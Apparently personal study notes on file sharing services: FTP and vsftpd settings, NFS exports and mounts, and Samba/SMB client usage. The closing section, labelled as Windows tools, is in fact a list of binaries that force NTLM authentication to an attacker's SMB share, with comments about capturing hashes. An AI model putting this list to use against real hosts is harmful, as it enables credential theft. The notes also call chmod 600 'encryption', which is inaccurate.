Some Network File Sharing Services

Storage

There are three storage types:

1. Direct Attached Storage (DAS)
2. Network Attached Storage (NAS)
3. Storage Area Network (SAN)

DAS

Your own destop computer, with a large volumn disk attached, is a kind of Direct Attached Storage.

NAS

Now there are many routers that you can plug in external usb storage and then access the storage via LAN network, it is a kind of Network Attached Storage.

SAN

It uses a special SAN Switch to be the gate of distributed storage device. This is suitable for big business companies.

File Transfer Protocol

FTP is a protocol based on C/S, and a dual channel protocol: port 21 for command and port 20 for data connection.

From server side, FTP has two modes.

• PORT style
  command: client random port -> server port 21
  data: client random port <- server port 20
  Client port to connect was negotiated in handshake of command tunnel.
• PASV style
  command: client random port -> server port 21
  data: client random port -> server random port
  Server port to connect was negotiated in handshake of command tunnel.

Server command port is always 21. Server data port is fixed in normal.

Example: in PASV style you get: 227 Entering Passive Mode (172,16,0,1,224,59), then server port to connect is: 224*256+59.

Softwares

Server side:

• Wu-ftpd
• Proftpd
• Pureftpd
• Filezilla Server
• Serv-U
• Wing FTP Server
• IIS
• Very Secure FTP Daemon (vsftpd, popular)

Client side:

• ftp
• lftp
• lftpget
• wget
• curl
• browser

Very Secure FTP Daemon

vsftp is a relatively popular FTP server program.
Service to start:

/usr/lib/systemd/system/vsftpd.service
/etc/rc.d/init.d/vsftpd

Start the Service:

$ systemctl start vsftpd

Config file location:

/etc/vsftpd/vsftpd.conf

Configuration items:

# POST style    (windows client as default)
connect_from_port_20=YES    # confirm port 20
ftp_data_port=20            # assign another port rather than 20
# PASV style    (linux client as default)
pasv_min_port=6000          # from 6000
pasv_max_port=6010          # to 6010

use_localtime=YES           # `No` by default, which is using GMT
anonymous_enable=YES        # `No` by default in CentOS8
no_anon_password=YES        # annoymous need no passwd
anon_upload_enable=YES      # upload priv
anon_mkdir_write_enable=YES # mkdir priv

Network File System

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems (Sun) in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.

NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system, fits C/S architecture.

The NFS is an open standard defined in a Request for Comments (RFC), allowing anyone to implement the protocol.

Softwares

On CentOS (in yum repo) the NFS Utilities package (nfs-utils) contains the userspace server and client tools necessary to use the kernel’s NFS abilities.

On Ubuntu (in apt repo) we have nfs-kernel-server for server side and nfs-common for client side.

nfs-utils

It is for CentOS.
The package is nfs-utils.
Related packages are rpcbind (necessary) and tcp_wrappers.
Kernel object file needed is nfs.ko.

Port 2049 is used by nfsd, and other ports assigned by rpcbind (used to be portmap, before CentOS 6)

NFS service process:

• rpc.nfsd
  • Most important NFS process, manage whether the client can log in
• rpc.mountd
  • Mount and unmount NFS, including permission/privilege management
• rpc.lockd
  • Non-essential, manage file locks to avoid simultaneous write errors
• rpc.statd
  • Non-essential, check file consistency, repair broken file

Logs in /var/lib/nfs/, and configurations are /etc/exports and /etc/exports.d/*.exports.

Format of config files:

/dir    host1(opt1,opt2)    host2(opt1,opt2) ...     
# assign '/dir' to host1, host2 and ...
# 'host' can be ipv4, ipv6, FQDN (Fully Qualified Domain Name) like:
    172.18.0.0/255.255.0.0
    172.18.0.0/16
    www.domain.com
    *.domain.com
# 'opt' can be default(ro,sync,root_squash,no_all_squash) and more:
    ro,rw   -- read-only and read-write
    async   -- asynchronous, not write immediately, high performance
    sync    -- synchronization, write immediately after data changing
    root_squash    -- Remote root mapping is nfsnobody/nobody, UID 65534
    no_root_squash -- Remote root mapped as root user, without authority squeezed
    all_squash     -- all remote users become nfsnobody/nobody
    no_all_squash  -- retain the UID and GID of shared files
    anonuid and anongid --  indicate that anonymous users are mapped to specific user UIDs and group GIDs instead of nfsnobody, which can be used with all_squash

Some NFS related tools:

1. rpcinfo: see RPC information
   • -p [hostname] see port list
   • -s [hostname] see registered programs
2. exportfs: manage NFS
   • -v see all local NFS shares
   • -r reread config files, and share dirs
   • -a output all local shares, resume all suspended shares
   • -au stop all local sharing
3. showmount
   • -e [hostname] print shared file list
4. autofs: service for auto mount
   • package: autofs
   • service: /usr/lib/systemd/system/autofs.service
   • config file in /etc/auto.master
5. mount.nfs: also for auto mount
   • config file in /etc/fstab

For mounting, there are some parameters:

• fg: Mount at the front
• bg: Mount in the background
• hard: Persistent mounting request
• soft: Non-persistent request
• intr: Work with ‘hard’, means can be interupted by ctrl+c
• rsize/wsize: Maximum number of bytes to read and write data at a time, rsize = 32768
• _netdev: No mounting without network

We can mount manually:

mount -o rw,nosuid,fg,hard,intr x.x.x.x:/testdir /mnt/nfs/

Or automatically:

$ vim /etc/fstab
x.x.x.x:/public /mnt/nfs nfs defaults,_netdev 0 0

Using example:
Start service at server side.

$ mkdir /data/share1
$ mkdir /data/share2
$ touch /data/share1/share1.txt
$ touch /data/share2/share2.txt
$ vim /etc/exports
$ cat /etc/exports
/data/share1/ *
$ vim /etc/exports.d/test.exports
$ cat /etc/exports.d/test.exports 
/data/share2 *
$ exportfs -v
$ exportfs -r
exportfs: No options for /data/share1/ *: suggest *(sync) to avoid warning
exportfs: No options for /data/share2 *: suggest *(sync) to avoid warning
$ exportfs -v
/data/share1  	<world>(sync,wdelay,hide,no_subtree_check,sec=sys,ro,secure,root_squash,no_all_squash)
/data/share2  	<world>(sync,wdelay,hide,no_subtree_check,sec=sys,ro,secure,root_squash,no_all_squash)

See sharing files and mount NFS dicks at client side.

$ showmount -e nfs_server_ip
Export list for nfs_server_ip:
/data/share2 *             
/data/share1 *
$
$ mkdir /mnt/nfs1
$ mount nfs_server_ip:/data/share1 /mnt/nfs1
$ ls /mnt/nfs1/
share1.txt

Examples for NFS config.

$ vim /etc/exports
/myshare server.example.com
/myshare *.example.com
/myshare server?.example.com
/myshare server[0-20].example.com
/myshare 172.25.11.10
/myshare 172.25.0.0/16
/myshare 2000:472:18:b51:c32:a21
/myshare 2000:472:18:b51::/64
/myshare *.example.com 172.25.0.0/16
/myshare desktop.example.com(ro)
/myshare desktop.example.com(ro) server[0-20].example.com(rw)
/myshare diskless.example.com(rw,no_root_squash)

$ vim /etc/exports.d/test.exports
/data/share2 * 192.168.32.0/24(ro) 192.168.32.7(rw)

nfs-kernel-server and nfs-common

Configurations and usage are the same as nfs-utils, see this link for the details.

Samba

What is Samba? A collection of different applications with when used together let a Linux server perform network actions like file serving, authentication/authorization, name resolution and print services.

Like CIFS, Samba implements the SMB protocol which is what allows Windows clients to transparently access Linux directories, printers and files on a Samba server (just as if they were talking to a Windows server).

Crucially, Samba allows for a Linux server to act as a Domain Controller. By doing so, user credentials on the Windows Domain can be used instead of needing to be recreated and then manually kept in sync on the Linux server.

Server Message Block

The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network.

Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server.

Common Internet File System

CIFS stands for “Common Internet File System.”, which is a dialect of SMB, is a particular implementation of the Server Message Block protocol, created by Microsoft.

CIFS and SMB are interchangeable not only in a discussion but also in application – i.e., a client speaking CIFS can talk to a server speaking SMB and vice versa because CIFS is a form of SMB.

While they are the same top level protocol, there are still differences in implementation and performance tuning (hence the different names). Protocol implementations like CIFS vs SMB often handle things like file locking, performance over LAN/WAN, and mass modification of file differently.

But, in this day and age, you should always use the acronym SMB.

Two reasons:

1. The CIFS implementation of SMB is rarely used these days. Under the covers, most modern storage systems no longer use CIFS, they use SMB v2 or SMB v3. In the Windows world, SMB v2 has been the standard as of Windows Vista (2006) and SMB v3 is part of Windows 8 and Windows Server 2012.

2. CIFS has a negative connotation amongst pedants. SMB v2 and SMB v3 are massive upgrades over the CIFS dialect, and storage architects who are near and dear to file sharing protocols don’t appreciate the misnomer. It’s kind of like calling an executive assistant a secretary.

Softwares

Packages:

• samba: Provide SMB service
• samba-client: Client
• samba-common: General tools
• cifs-utils: Client tools
• samba-winbind: Related to AD

Services:

• smbd: Provide SMB (CIFS) service, TCP:139,445
• nmbd: NetBIOS name resolution, UDP:137,138

Configuration file: /etc/samba/smb.conf
Grammar check: testparm [-v] [/etc/samba/smb.conf]
Client softwares: smbclient, mount.cifs

Usage

Server side:

$ systemctl start smb # start smbd
$ systemctl start nmb # start nmbd

Client side:
Universal Naming Convention (UNC) goes like:

\\sambaserver\sharename
# 'sambaserver' can be domain name or ip address 

Use smbclient to access:

$ smbclient -L instructor.example.com
$ smbclient -L instructor.example.com -U smb_user
# '-U' to assign user%password, or set environment variables: USER and PASSWD
$ smbclient //instructor.example.com/shared -U username
>cd directory
>get file1
>put file2

Mount CIFS file system:

mount -o user=username,password=passwd //server/shared /mnt/smb

Automatically mount at boot:

$ cat /etc/fstab
//server/homes /mnt cifs credentials
# or use file to replace username & password input
cred=/etc/smb.txt 0 0

$ cat /etc/smb.txt
username=wang     #或 user=wang
password=password #或 pass=password
chmod 600 /etc/smb.txt       #这一步加密很重要

On Windows we have a lot of tools to use:

net.exe use \\host\share
attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share #(noisy, pops an error dialog)
certutil.exe \\host\share
cipher.exe \\host\share
ClipUp.exe -l \\host\share
cmdl32.exe \\host\share
cmstp.exe /s \\host\share
colorcpl.exe \\host\share #(noisy, pops an error dialog)
comp.exe /N=0 \\host\share \\host\share
compact.exe \\host\share
control.exe \\host\share
convertvhd.exe -source \\host\share -destination \\host\share
Defrag.exe \\host\share
DeployUtil.exe /install \\host\share
DevToolsLauncher.exe GetFileListing \\host\share #(this one's cool. will return a file listing (json-formatted) from remote SMB share...)
diskperf.exe \\host\share
dispdiag.exe -out \\host\share
doskey.exe /MACROFILE=\\host\share
esentutl.exe /k \\host\share
expand.exe \\host\share
extrac32.exe \\host\share
FileHistory.exe \\host\share #(noisy, pops a gui)
findstr.exe * \\host\share
fontview.exe \\host\share #(noisy, pops an error dialog)
fvenotify.exe \\host\share #(noisy, pops an access denied error)
FXSCOVER.exe \\host\share #(noisy, pops GUI)
hwrcomp.exe -check \\host\share
hwrreg.exe \\host\share
icacls.exe \\host\share
LaunchWinApp.exe \\host\share #(noisy, will pop an explorer window with the  contents of your SMB share.)
licensingdiag.exe -cab \\host\share
lodctr.exe \\host\share
lpksetup.exe /p \\host\share /s
makecab.exe \\host\share
MdmDiagnosticsTool.exe -out \\host\share #(sends hash, and as a *bonus!* writes an MDMDiagReport.html to the attacker share with full CSP configuration.)
mshta.exe \\host\share #(noisy, pops an HTA window)
msiexec.exe /update \\host\share /quiet
msinfo32.exe \\host\share #(noisy, pops a "cannot open" dialog)
mspaint.exe \\host\share #(noisy, invalid path to png error)
mspaint.exe \\host\share\share.png #(will capture hash, and display the remote PNG file to the user)
msra.exe /openfile \\host\share #(noisy, error)
mstsc.exe \\host\share #(noisy, error)
netcfg.exe -l \\host\share -c p -i foo